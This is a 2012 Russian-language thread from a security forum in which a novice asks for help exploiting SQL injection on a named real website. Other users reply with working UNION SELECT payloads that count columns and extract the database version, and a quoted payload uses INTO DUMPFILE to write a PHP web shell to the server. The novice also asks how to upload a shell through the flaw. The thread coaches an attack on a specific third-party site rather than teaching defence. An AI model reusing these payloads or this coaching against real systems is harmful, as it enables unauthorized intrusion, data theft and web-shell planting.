HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2012, 20:04
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

а что Вы вывели таким кодом?
 

  #2  
Старый 26.08.2012, 22:52
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Цитата:
Сообщение от Дирижабль  
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
Подскажите пожалуйста здесь подробнее.

'
 

  #3  
Старый 28.08.2012, 23:06
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13

Затем ввожу

site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+

Ошибка.В чём здесь моя ошибка?Спасибо.
 

  #4  
Старый 28.08.2012, 23:48
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
Провел на форуме:
7224

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
Таким способом колонки не всегда удаётся узнать, линк в студию
 

  #5  
Старый 29.08.2012, 22:52
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
 

  #6  
Старый 29.08.2012, 23:49
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Sat-hacker  
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
неправильно поля подобрал...

Вывод можно получить так

Код:
_ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
Failed opening '/var/www/html/inc/templates/4.1.12' for inclusion

А вообще тема для таких вопросов тут
 

  #7  
Старый 30.08.2012, 00:33
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
Провел на форуме:
7224

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+

False

http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+

True - Not found

Значит - Столбцов 14

дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
 

  #8  
Старый 30.08.2012, 00:48
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
 

  #9  
Старый 30.08.2012, 08:35
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Просто не очень понял как при помощи этого кода '' залить shell.

Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
 

  #10  
Старый 30.08.2012, 08:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sat-hacker  
просто не могу разобраться вот и спросил
просто не пытаешься разобраться вот и спрашиваешь
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.